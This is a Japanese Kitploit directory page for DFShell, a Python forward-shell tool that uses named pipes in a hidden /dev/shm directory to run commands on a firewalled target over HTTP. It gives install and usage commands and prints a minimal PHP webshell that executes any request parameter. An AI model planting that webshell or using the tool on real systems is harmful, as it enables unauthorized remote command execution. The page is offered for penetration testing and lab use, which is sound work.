Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
DFShell — Pythonベースのフォワードシェルツール。名前付きパイプを使用してHTTP上でTTYライクなインタラクティブシェルを作成し、永続的なネットワーク接続なしでファイアウォールで保護されたターゲット上でのコマンド実行を可能にします。 | Kitploit
ツール/GitHubGitHub/d3ext/dfshell
ペイロード生成シェルコードウェブアプリケーション悪用ペネトレーションテスト
GitHubd3ext/dfshell

DFShell

Pythonベースのフォワードシェルツール。名前付きパイプを使用してHTTP上でTTYライクなインタラクティブシェルを作成し、永続的なネットワーク接続なしでファイアウォールで保護されたターゲット上でのコマンド実行を可能にします。

リポジトリを見る
122192年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
root@kitploit:~
██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║  ██║██╔════╝██║     ██║     
██║  ██║█████╗  ███████╗███████║█████╗  ██║     ██║     
██║  ██║██╔══╝  ╚════██║██╔══██║██╔══╝  ██║     ██║     
██████╔╝██║     ███████║██║  ██║███████╗███████╗███████╗
╚═════╝ ╚═╝     ╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝                      

はじめに

D3Ext's Forward Shell は、mkfifoを使用して被害マシン上でシェルをシミュレートするPython3スクリプトです。/dev/shm/.fs/ に隠しディレクトリを作成し、そこにFIFOを格納します。Webシェル上でもTTYをシミュレートできます。

説明

このフォワードシェルは、名前付きパイプ (mkfifo) を介してコマンドを受け付け、結果をファイルに出力するシェルを作成します。これにより、永続的なネットワーク接続を必要とせず、リバース/バインドシェルをブロックするファイアウォールの背後でも適切なTTYを確立できます。

  1. ターゲットサーバー上に名前付きパイプを作成
  2. 名前付きパイプから受信したコマンドを読み取り、実行
  3. STDOUTとSTDERRを出力ファイルに保存
  4. ステップ2に戻り、名前付きパイプから再度読み取る

特徴

  • 高速かつ設定可能
  • 統合された強力なコマンド
  • 対話型TTYシェル

インストール

ソースからインストール

root@kitploit:~
git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements.txt

pipでインストール

root@kitploit:~
pip3 install dfshell

使い方

DFShell には、フォワードシェルの設定を改善するための様々なCLIパラメータがあります。

ヘルプパネル

root@kitploit:~
usage: dfshell.py [-h] -u URL -p PARAMETER [-t TIMEOUT] [--path PATH] [-v VERBOSE]

D3Ext's Forward Shell - Enhanced forward shell with integrated commands

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     url of the webshell (i.e. http://10.10.10.10/webshell.php)
  -p PARAMETER, --parameter PARAMETER
                        parameter of the webshell to execute commands (i.e. cmd)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of requests that execute commands (default 20s)
  --path PATH           path in which to create named pipes (default /dev/shm/.fs)
  -v VERBOSE, --verbose VERBOSE
                        print more information

指定されたURLにGETリクエストを送信するため、Webシェルは以下のようになっている必要があります:

root@kitploit:~
<?php
  if(isset($_REQUEST['cmd']))
  {
    system($_REQUEST['cmd']);
  }
?>

Parrot OS 上のApacheサーバーでテスト済み

管理された環境でこのツールをテストしたい場合、以下はHackTheBoxマシンのリストで、Webサーバーにファイアウォールルールが適用されているため、フォワードシェルが権限昇格に直接進むための優れた代替手段となります。

  • Inception




デモ

参考文献

この素晴らしいテクニックを提供してくれた @ippsec に感謝

root@kitploit:~
https://github.com/IppSec/forward-shell
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux#forward-shell
https://www.f5.com/labs/learning-center/forward-and-reverse-shells
https://github.com/Hypnoze57/FShell
https://s4vitar.github.io/ttyoverhttp/

貢献

CONTRIBUTING.md をご覧ください。

変更履歴

CHANGELOG.md をご覧ください。

ライセンス

このプロジェクトはMITライセンスの下で提供されています。

Copyright © 2023, D3Ext

支援

Buy Me A Coffee

ツールをダウンロード